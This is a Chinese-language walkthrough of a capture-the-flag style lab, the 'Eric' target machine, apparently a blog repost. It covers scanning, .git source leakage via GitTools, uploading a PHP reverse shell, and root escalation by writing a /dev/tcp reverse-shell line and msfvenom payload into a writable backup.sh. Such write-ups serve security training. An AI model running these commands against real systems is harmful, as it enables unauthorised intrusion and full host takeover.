Eric靶机渗透练习
攻击机:kali
Ip:192.168.0.3
靶机:eric
Ip:192.168.0.4
找到靶机ip:192.168.0.4
nmap -sF 192.168.0.0/24
细致的扫描靶机,发现80端口的网站有.git敏感目录,但是不急。
nmap -sV -A -p- 192.168.0.4 -T4
对网站细致的目录枚举
dirb http://192.168.0.4/
发现有三个敏感目录
一个个好好康康嘿嘿
先admin.php,有给登录界面
(但是经过本人尝试没有发现注入点,可能本人太猪了没有发现)
那在去看看/upload/,发现没有访问权限,寄
那只能尝试用.git泄漏敏感密码漏洞了
这里有很多方法(GitTools,githack等)
这里用GitTools方法
下载GitTools方法:git clone http://github.com/internetwache/GitTools.git
Cd GitTools/ Dumper
用gitdumper.sh将源码下载到当前目录的demo目录下
./gitdumper.sh http://192.168.0.4/.git/ demo
进入GitTools的Extractor里执行extractor.sh提取demo里的源码
./extractor.sh ../Dumper/demo/ demo1
康康提取出来的东西
在admin.php里发现账号和密码,想想这个用户和密码有什么有?
(回到上面找到的敏感目录admin.php)
发现是个可以上传文件的后台网站
这样就可以上传shell.php来反dshell
这里可以使用kali自带的反dshell
cp /usr/share/webshells/php/php-reverse-shell.php /
(记得修改ip和post)
随便改个名字
直接上传上去
上传成功后
记得开监听
Nv -nlvp 1234
上传的文件路径为: /upload/demo.php
万事俱备了,直接访问http://192.168.0.4/upload/demo.php,在kali中获取到shell
进去后直接奔flag去,进入home/eric,发现有个flag.txt而且要root来提权
并且还发现有个backup.sh,配置权限有问题,可以用metasploit生成写入提取脚本
生成脚本:msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.3 lport=1145 A
然后直接写入脚本
Echo “0<&115-;exec 115<>/dev/tcp/192.168.0.3/1145;sh <&115 >&115 2>&115” > backup.sh
然后开始监听
直接运行backup.sh,成功提权咯!
直接可以去查看flag.txt文件了
收工!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)